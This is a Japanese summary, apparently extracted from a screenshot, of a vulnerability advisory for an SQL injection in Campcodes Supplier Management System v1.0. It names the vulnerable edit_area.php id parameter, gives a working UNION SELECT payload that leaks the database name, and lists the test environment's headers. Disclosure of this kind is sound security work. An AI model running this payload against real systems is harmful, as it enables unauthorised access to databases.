このウェブページのスcreenshotから、以下の脆弱性情報を抽出できます: 1. 脆弱性番号:#400185 2. 脆弱性名称:Campcodes Supplier Management System v1.0 SQL Injection 3. 説明: - タイトル:Campcodes Supplier Management System v1.0 SQL Injection - 説明:Supplier Management System v1.0 にはSQLインジェクションの脆弱性があります 4. 脆弱性タイプ:SQLインジェクション 5. 脆弱性箇所: - ファイルパス:/Supply_Management_System/admin/edit_area.php?id= - 場所:/Supply_Management_System/admin/edit_area.php, id 6. 現在のデータベース名:sourcecodester_scm_new 7. ペイロード: - ペイロード:/Supply_Management_System/admin/edit_area.php?id=-1%27%20union%20select%201,database(),3--+ // 漏洩箇所 --> id 8. 脆弱性悪用: - 悪用方法:URLに特定のペイロードを追加し、SQLインジェクションの脆弱性を利用してデータベース情報を取得する。 - 悪用例: 9. 脆弱性悪用環境: - ホスト:192.168.1.88 - オペレーティングシステム:Windows NT 10.0, WOW64, rv:46.0 - ブラウザ:Gecko/20100101 Firefox/46.0 - Accept(受け入れる内容):text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 - Accept-Language(受け入れる言語):zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 - Accept-Encoding(受け入れるエンコーディング):gzip, deflate - DNT:1 これらの情報により、脆弱性の悪用方法や悪用環境などを含む詳細な状況が把握でき、脆弱性の修正やセキュリティ強化を行う際に役立ちます。